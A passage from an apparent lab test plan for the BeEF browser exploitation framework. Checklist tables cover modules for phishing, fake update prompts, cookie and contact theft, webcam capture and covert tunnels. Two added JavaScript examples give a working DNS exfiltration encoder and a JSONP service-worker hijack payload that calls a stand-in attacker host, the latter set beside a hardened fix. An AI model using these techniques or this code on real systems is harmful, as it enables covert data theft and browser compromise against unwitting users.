| :---: | :--- | :--- | :--- | :--- |
| [ ] | **Clippy** | 1. Configure: `Clippy image directory`...<br>2. Click Execute.<br><br>_Brings up a Clippy image and asks the user to do stuff._ | None. | |
| [ ] | **Detect Social Networks** | 1. Configure: `Detection Timeout`<br>2. Click Execute.<br><br>_Detects if authenticated to GMail, Facebook and Twitter._ | None. | |
| [ ] | **Fake Flash Update** | 1. Configure: `Image`, `Payload URI`<br>2. Click Execute.<br><br>_Prompts the user to install an update to Adobe Flash Player._ | None. | |
| [ ] | **Fake Notification Bar** | 1. Configure: `Notification text`<br>2. Click Execute.<br><br>_Displays a fake notification bar._ | None. | |
| [ ] | **Fake Notification Bar (Chrome)** | 1. Configure: `URL`, `Notification text`<br>2. Click Execute.<br><br>_Displays a fake Chrome notification bar._ | None. | |
| [ ] | **Fake Notification Bar (Firefox)** | 1. Configure: `Plugin URL`, `Notification text`<br>2. Click Execute.<br><br>_Displays a fake Firefox notification bar._ | None. | |
| [ ] | **Fake Notification Bar (IE)** | 1. Configure: `URL`, `Notification text`<br>2. Click Execute.<br><br>_Displays a fake IE notification bar._ | None. | |
| [x] | **Google Phishing** | 1. Configure: `XSS hook URI`, `Gmail logout interval`...<br>2. Click Execute.<br><br>_XSRF logout of Gmail, show phishing page._ | None. | |
| [ ] | **Read Gmail** | 1. Click Execute.<br><br>_Grabs unread message ids from the Gmail Atom feed._ | None. | |
| [ ] | **Send Gvoice SMS** | 1. Configure: `To`, `Message`<br>2. Click Execute.<br><br>_Send a text message (SMS) through Google Voice._ | None. | |
| [ ] | **Skype iPhone XSS** | 1. Click Execute.<br><br>_Steals iPhone contacts using a Skype XSS vuln._ | None. | |

#### 3.2.5 Advanced Network & Infrastructure

Requires specific network configurations (e.g., DNS, Tor, Proxy, WPAD).

| Status | Module Name | Instructions / Description | Cleanup Needed | Comments |
| :---: | :--- | :--- | :--- | :--- |
| [ ] | **DNS Tunnel** | 1. Configure: `Domain`, `Data to send`<br>2. Click Execute.<br><br>_This module sends data one way over DNS, client to server only._ | None. | |
| [ ] | **DNS Tunnel** | 1. Configure: `Domain`, `Message`, `Wait between requests (ms)`<br>2. Click Execute.<br><br>_This module sends data one way over DNS. Message split into chunks._ | None. | |
| [ ] | **DNS Tunnel: Server-to-Client** | 1. Configure: `Payload Name`, `Zone`, `Message`<br>2. Click Execute.<br><br>_This module retrieves data sent by the server over a DNS covert channel._ | None. | |
| [ ] | **Detect Tor** | 1. Configure: `What Tor resource to request`, `Detection timeout`<br>2. Click Execute.<br><br>_This module will detect if the zombie is currently using Tor._ | None. | |
| [ ] | **Get Proxy Servers (WPAD)** | 1. Click Execute.<br><br>_This module retrieves proxy server addresses for the zombie browser's local network using WPAD._ | None. | |
|
|
|
|
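The client-to-server DNS tunnel rows above only say that data is sent one way and "split into chunks". The following added example (written for this plan, not BeEF's own module code) shows the encoding such a tunnel needs: the message is hex-encoded, cut into DNS labels of at most 63 characters, and each query name carries a sequence number so the receiving side can reassemble queries that arrive out of order or are repeated by resolver retries. The label layout, the `b33f` session label and the `tunnel.example` domain are assumptions for illustration; the hooked browser would resolve each returned name, for instance by using it as an image source.

```javascript
// Added example: client-to-server DNS tunnel encoding/decoding (not BeEF code).
// Layout per query (assumed): <hex labels>.<4-digit seq>.<session>.<domain>
const MAX_LABEL = 63;  // RFC 1035 limit per label
const MAX_NAME = 253;  // practical limit for a full name in text form

function toHex(str) {
  return Array.from(new TextEncoder().encode(str), b => b.toString(16).padStart(2, '0')).join('');
}

function fromHex(hex) {
  const bytes = new Uint8Array(hex.length / 2);
  for (let i = 0; i < bytes.length; i++) bytes[i] = parseInt(hex.slice(i * 2, i * 2 + 2), 16);
  return new TextDecoder().decode(bytes);
}

// Client side: the list of names the hooked browser would resolve. Hex is used
// rather than base64 because DNS names are case-insensitive and resolvers may
// change letter case on the way (0x20 randomization), which would corrupt base64.
function encodeForDnsTunnel(message, domain, session = 'b33f') {
  const hex = toHex(message);
  // Per-query budget: the fixed suffix ".<seq>.<session>.<domain>" eats into the 253 limit.
  const suffixLen = 1 + 4 + 1 + session.length + 1 + domain.length;
  const labelsPerQuery = Math.max(1, Math.floor((MAX_NAME - suffixLen) / (MAX_LABEL + 1)));
  let chunkSize = labelsPerQuery * MAX_LABEL;
  if (chunkSize % 2) chunkSize -= 1;  // keep whole bytes inside one query
  const names = [];
  for (let pos = 0, seq = 0; pos < hex.length; pos += chunkSize, seq += 1) {
    const labels = hex.slice(pos, pos + chunkSize).match(/.{1,63}/g);
    names.push(`${labels.join('.')}.${String(seq).padStart(4, '0')}.${session}.${domain}`);
  }
  return names;
}

// Server side: rebuild the message from the query names seen in the DNS log.
// Unrelated names are ignored, case and a trailing dot are normalised, retries
// overwrite the same sequence slot, and a missing sequence number (dropped
// query) makes the function return null instead of a silently truncated message.
function decodeDnsTunnel(queryNames, domain, session = 'b33f') {
  const suffix = `.${session}.${domain}`.toLowerCase();
  const chunks = new Map();
  for (const raw of queryNames) {
    const name = raw.toLowerCase().replace(/\.$/, '');
    if (!name.endsWith(suffix)) continue;
    const labels = name.slice(0, -suffix.length).split('.');
    const seq = Number.parseInt(labels.pop(), 10);
    if (Number.isNaN(seq)) continue;
    chunks.set(seq, labels.join(''));
  }
  const seqs = [...chunks.keys()].sort((a, b) => a - b);
  if (seqs.some((s, i) => s !== i)) return null;
  return fromHex(seqs.map(s => chunks.get(s)).join(''));
}

// Usage with a constructed message:
// encodeForDnsTunnel('hello world', 'tunnel.example')
//   -> ['68656c6c6f20776f726c64.0000.b33f.tunnel.example']
```

With a 14-character domain and the 4-character session label, each query carries 188 hex characters (94 bytes), so a 300-byte message becomes four queries; the `Wait between requests (ms)` parameter of the second DNS Tunnel module is the delay between such queries.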
#### 3.2.6 Antivirus (Requires Specific AV/Extension)

The "Detect Antivirus" module looks for artifacts (injected scripts, User-Agent changes, or specific DOM elements) created by commercial antivirus products or their browser extensions.

**Setup Steps (Local VM):**

1. **Install Browser Extension**: BeEF detects specific artifacts in the DOM or User-Agent string. A free option to test is the **Avast Online Security** extension.
   - Open Firefox in the VM.
   - Navigate to the [Avast Online Security & Privacy](https://addons.mozilla.org/en-US/firefox/addon/avast-online-security/) addon page.
   - Click **Add to Firefox**.
2. **Execute**: Run the module.
   - *Note: detection depends on the extension injecting the signatures the module looks for (e.g. `ASW/` in the User-Agent string), and these vary by version. A negative result on a current extension build does not by itself mean the module is broken; compare the signatures the module checks against what the installed version actually injects (inspect `navigator.userAgent` and the page DOM in the developer tools).*

| Status | Module Name | Instructions / Description | Cleanup Needed | Comments |
| :---: | :--- | :--- | :--- | :--- |
| [ ] | **Detect Antivirus** | 1. Install the Avast extension (see above).<br>2. Execute module.<br>3. Check results for "Avast" or another detected AV. | Uninstall extension. | |

#### 3.2.7 Browser Extensions (Requires Installation)

These modules detect specific browser extensions, which must be installed in the hooked browser to be detectable.

**Setup Steps:**

1. **LastPass**: Install the [LastPass Password Manager](https://addons.mozilla.org/en-US/firefox/addon/lastpass-password-manager/) extension in Firefox.
2. **FireBug**: FireBug is obsolete and does not run on current Firefox releases. This module may only work on older browser versions or specific legacy environments.

| Status | Module Name | Instructions / Description | Cleanup Needed | Comments |
| :---: | :--- | :--- | :--- | :--- |
| [x] | **Detect FireBug** | 1. Execute module.<br>2. Verify detection if legacy FireBug is present. | None. | |
| [ ] | **Detect LastPass** | 1. Install the LastPass extension.<br>2. Execute module.<br>3. Verify results show "Detected LastPass...". | Uninstall extension. | |
| [ ] | **Detect Toolbars** | 1. Install a supported toolbar (e.g. legacy Google Toolbar, Alexa Toolbar).<br>2. Execute module.<br>3. Verify results show the detected toolbar name. | Uninstall toolbar. | Both example toolbars are discontinued; expect this to be testable only in a legacy environment. |

#### 3.2.8 BeEF Extensions (Requires Configuration)

Some modules require specific BeEF extensions to be enabled in the server configuration.

**Setup Steps:**

1. **Enable ETag Extension**:
   - Open `config.yaml` in the BeEF root directory.
   - Find the `extension: etag:` section.
   - Set `enable: true`.
2. **Enable S2C DNS Tunnel Extension** (if testing DNS Tunnel S2C):
   - In `config.yaml`, find `extension: s2c_dns_tunnel:`.
   - Set `enable: true`.
3. **Restart BeEF**: Extensions are loaded at startup, so you must restart the BeEF server for these changes to take effect. Check the startup output to confirm the extension loaded without errors before running the module.

| Status | Module Name | Instructions / Description | Cleanup Needed | Comments |
| :---: | :--- | :--- | :--- | :--- |
| [ ] | **ETag Tunnel: Server-to-Client** | 1. Enable the **ETag extension** in `config.yaml` and restart BeEF.<br>2. Set `Payload Name` and `Message`.<br>3. Execute module.<br>4. Verify the message is delivered (check the browser results/window property). | Disable the extension in `config.yaml` (optional). | |

### 3.3 Phase 3: Other Browsers & Specialized Extensions

Test these modules **only if they cannot be tested in Firefox**. Use Chrome, Safari, or Edge. Some of them (e.g. Execute On Tab, Get All Cookies) run inside a hooked Chrome extension rather than a hooked page and need that extension context to work at all.

| Status | Module Name | Instructions / Description | Cleanup Needed | Comments |
| :---: | :--- | :--- | :--- | :--- |
| [ ] | **DNS Rebinding** | 1. Click Execute.<br><br>_No description beyond the module id `dnsrebind`._ | None. | |
| [ ] | **Detect Evernote Web Clipper** | 1. Click Execute.<br><br>_Checks whether the Evernote Web Clipper extension is installed and active._ | None. | |
| [ ] | **Execute On Tab** | 1. Configure: `URL`, `Javascript`<br>2. Click Execute.<br><br>_Opens a new tab and executes the JavaScript code in it. Chrome extension specific._ | None. | |
| [ ] | **Fake Evernote Web Clipper Login** | 1. Click Execute.<br><br>_Displays a fake Evernote Web Clipper login dialog._ | None. | |
| [ ] | **Fake LastPass** | 1. Click Execute.<br><br>_Displays a fake LastPass user dialog. (Often Chrome specific.)_ | None. | |
| [ ] | **Get All Cookies** | 1. Configure: `Domain (e.g. http://facebook.com)`<br>2. Click Execute.<br><br>_Steals cookies, including HttpOnly cookies, provided the hooked extension has cookie access._ | Clear browser cookies. | |
| [ ] | **Get Visited URLs (Avant Browser)** | 1. Configure: `Command ID`<br>2. Click Execute.<br><br>_Attempts to retrieve history via `AFRunCommand()`. Avant Browser only._ | None. | |
| [ ] | **Get Visited URLs (Old Browsers)** | 1. Configure: `URL(s)`<br>2. Click Execute.<br><br>_Detects visited URLs in older browsers._ | None. | |
| [ ] | **Grab Google Contacts** | 1. Click Execute.<br><br>_Attempts to grab the contacts... exploiting export to CSV._ | None. | |
| [ ] | **Hook Microsoft Edge** | 1. Configure: `URL`<br>2. Click Execute.<br><br>_Uses the `microsoft-edge:` protocol handler to hook Edge._ | None. | |
| [ ] | **Inject BeEF** | 1. Click Execute.<br><br>_Attempts to inject the BeEF hook into all available tabs._ | None. | |
| [ ] | **JSONP Service Worker** | 1. Configure: `Path of the current domain`...<br>2. Click Execute.<br><br>_Exploits an unfiltered callback parameter in a JSONP endpoint._ | Close tab/window. Check for residual pop-unders. If a service worker was registered, unregister it (run `navigator.serviceWorker.getRegistrations()` in the console and call `unregister()` on each). | |
| [ ] | **Local File Theft** | 1. Configure: `Target file`<br>2. Click Execute.<br><br>_JavaScript may have filesystem access when the page was loaded via the `file://` scheme (Safari/local). Does not apply to the `http://127.0.0.1:3000` demo page._ | None. | |
| [ ] | **Make Skype Call** | 1. Configure: `Number`<br>2. Click Execute.<br><br>_Forces the browser to place a Skype call via the `skype:` protocol handler._ | None. | |
| [ ] | **Make Telephone Call** | 1. Configure: `Number`<br>2. Click Execute.<br><br>_Forces the browser to place a telephone call (iOS) via the `tel:` protocol handler._ | None. | |
| [ ] | **Ping Sweep (Java)** | 1. Configure: `Scan IP range (C class or IP)`, `Timeout (ms)`<br>2. Click Execute.<br><br>_Discovers active hosts... using an unsigned Java applet. (Listed as an alternative for Firefox.)_ | None. | Needs a Java browser plugin, which current browsers no longer support. |
| [ ] | **Screenshot** | 1. Click Execute.<br><br>_Screenshots the current tab (Chrome/HTML5)._ | None. | |
| [ ] | **Webcam HTML5** | 1. Configure: `Screenshot size`<br>2. Click Execute.<br><br>_Uses HTML5 WebRTC (`getUserMedia`) to capture webcam images. Only tested in Chrome._ | None. | Requires a webcam and the user accepting the camera permission prompt. |
| [ ] | **iFrame Sniffer** | 1. Configure: `input URL`, `anchors to check`<br>2. Click Execute.<br><br>_Attempts framesniffing (aka Leaky Frame)._ | None. | |

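The JSONP Service Worker row above depends on a target endpoint that echoes its `callback` parameter unfiltered. The following added example (written for this plan, not BeEF's module code) shows why that matters: a JSONP response is JavaScript served from the target origin, so if the attacker controls its first bytes the endpoint doubles as a script source that can, for instance, be registered as a service worker. It contrasts a vulnerable builder with a hardened one. The endpoint shape, the sample data and the attacker callback are constructed for illustration.

```javascript
// Added example: unfiltered vs. filtered JSONP callback handling (not BeEF code).
const SAMPLE_DATA = { user: 'alice', roles: ['viewer'] };  // constructed

// Constructed attacker callback: valid JavaScript followed by "//" so that the
// "(<json>);" the endpoint appends is commented out. Served from the target
// origin with a JavaScript content type, this body is a usable worker script.
const EVIL_CALLBACK =
  "self.addEventListener('fetch', e => e.respondWith(fetch('https://attacker.invalid/')));//";

// Vulnerable endpoint: echoes the callback verbatim in front of the JSON.
function jsonpUnfiltered(callback, data) {
  return {
    status: 200,
    headers: { 'Content-Type': 'application/javascript' },
    body: `${callback}(${JSON.stringify(data)});`,
  };
}

// Hardened endpoint: the callback must be a dotted JavaScript identifier and
// nothing else, and the body starts with a comment so it cannot be repurposed
// as a polyglot. Anything else is rejected rather than sanitised.
const CALLBACK_RE = /^[A-Za-z_$][\w$]*(\.[A-Za-z_$][\w$]*)*$/;

function jsonpFiltered(callback, data) {
  if (typeof callback !== 'string' || callback.length > 64 || !CALLBACK_RE.test(callback)) {
    return { status: 400, headers: { 'Content-Type': 'text/plain' }, body: 'invalid callback' };
  }
  return {
    status: 200,
    headers: {
      'Content-Type': 'application/javascript; charset=utf-8',
      'X-Content-Type-Options': 'nosniff',
    },
    body: `/**/${callback}(${JSON.stringify(data)});`,
  };
}

// Parse-only check: would a browser accept this body as a script at all?
// new Function() compiles without executing, so the attacker code never runs here.
function isValidScript(body) {
  try { new Function(body); return true; } catch (e) { return false; }
}

// The attacker needs a 200 response with a JavaScript content type whose body
// parses and begins with their code. This is what to check when assessing a
// candidate endpoint for the module.
function servesAttackerScript(response) {
  return response.status === 200 &&
    /javascript/.test(response.headers['Content-Type']) &&
    response.body.startsWith(EVIL_CALLBACK) &&
    isValidScript(response.body);
}

// Usage:
// servesAttackerScript(jsonpUnfiltered(EVIL_CALLBACK, SAMPLE_DATA)) -> true
// jsonpFiltered(EVIL_CALLBACK, SAMPLE_DATA).status                 -> 400
```

The identifier whitelist is the fix that matters; the `/**/` prefix and `X-Content-Type-Options: nosniff` are defence in depth for endpoints that must keep supporting JSONP at all.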